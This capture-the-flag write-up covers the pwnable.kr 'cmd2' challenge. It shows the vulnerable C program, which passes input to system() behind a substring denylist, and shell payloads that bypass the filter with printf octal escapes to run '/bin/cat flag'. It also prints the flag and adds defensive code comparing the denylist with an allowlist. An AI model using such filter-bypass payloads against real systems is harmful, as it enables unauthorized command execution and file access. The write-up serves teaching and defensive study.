Pwnable.kr - cmd2

Challenge description:

Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission… but I wanna play anytime I want!

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "=")!=0;
	r += strstr(cmd, "PATH")!=0;
	r += strstr(cmd, "export")!=0;
	r += strstr(cmd, "/")!=0;
	r += strstr(cmd, "`")!=0;
	r += strstr(cmd, "flag")!=0;
	return r;
}

extern char** environ;
void delete_env(){
	char** p;
	for(p=environ; *p; p++)	memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
	delete_env();
	putenv("PATH=/no_command_execution_until_you_become_a_hacker");
	printf("before:   %s\n", argv[1]);
	if(filter(argv[1])) return 0;
	printf("%s\n", argv[1]);
	system( argv[1] );
	return 0;
}

This challenge has more restrictions. The biggest one is that the forward slash / is filtered, which prevents us from executing a binary the usual way, by its path, like /bin/binary.

The only solution that worked for me is passing the octal value of / (57) to printf with the format string %b.

Solution:

cmd2@pwnable:~$ ./cmd2 '$(printf "%bbin%bcat %s%s" "\57" "\57" "fl" "ag")'
cmd2@pwnable:~$ ./cmd2 '$(read x; echo $x)'	# not my solution but it's very cool
/bin/cat flag

Flag: FuN_w1th_5h3ll_v4riabl3s_haha
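
Why the substring denylist in filter() does not hold, next to an allowlist lookup that does, as an added example that is not part of the original post or the challenge. The ALLOWED table, its paths and resolve() are hypothetical; the sample inputs are the strings from the solution above.

```c
#include <stdio.h>
#include <string.h>

/* The challenge's denylist, same checks: counts blocked substrings found. */
int filter(const char *cmd) {
    int r = 0;
    r += strstr(cmd, "=") != 0;
    r += strstr(cmd, "PATH") != 0;
    r += strstr(cmd, "export") != 0;
    r += strstr(cmd, "/") != 0;
    r += strstr(cmd, "`") != 0;
    r += strstr(cmd, "flag") != 0;
    return r;
}

/* Hypothetical allowlist: command name -> fixed absolute path (assumed). */
struct entry { const char *name; const char *path; };
static const struct entry ALLOWED[] = {
    { "id",   "/usr/bin/id" },
    { "date", "/bin/date"   },
};

/* Returns the path for an exact allowlisted name, else NULL. A wrapper
 * would pass that path to execv(), so no shell ever parses the input. */
const char *resolve(const char *cmd) {
    size_t i;
    if (cmd == NULL) return NULL;
    for (i = 0; i < sizeof ALLOWED / sizeof ALLOWED[0]; i++)
        if (strcmp(cmd, ALLOWED[i].name) == 0) return ALLOWED[i].path;
    return NULL;
}

int main(void) {
    /* Inputs taken from the solution above, plus one benign command. */
    const char *samples[] = {
        "$(printf \"%bbin%bcat %s%s\" \"\\57\" \"\\57\" \"fl\" \"ag\")",
        "$(read x; echo $x)",
        "/bin/cat flag",
        "id",
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("denylist=%-7s allowlist=%-7s %s\n",
               filter(samples[i]) ? "blocked" : "passes",
               resolve(samples[i]) ? "allowed" : "blocked",
               samples[i]);
    return 0;
}
```

The denylist inspects the string before the shell expands it, so anything the shell builds at run time is invisible to it; the allowlist rejects both solution strings because neither is an exact permitted name.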